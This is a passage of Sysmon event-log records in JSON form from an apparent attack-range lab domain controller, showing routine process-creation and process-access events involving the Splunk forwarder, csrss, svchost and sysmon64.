{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6729,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.835\r\nProcessGuid: {E2A3D6B1-12B3-5F25-0000-00106C750900}\r\nProcessId: 4576\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.835","ProcessGuid":"{E2A3D6B1-12B3-5F25-0000-00106C750900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6730,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12B3-5F25-0000-00106C750900}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12B3-5F25-0000-00106C750900}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6731,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B3-5F25-0000-00106C750900}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B3-5F25-0000-00106C750900}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6732,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6733,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6734,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6735,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6736,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6737,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 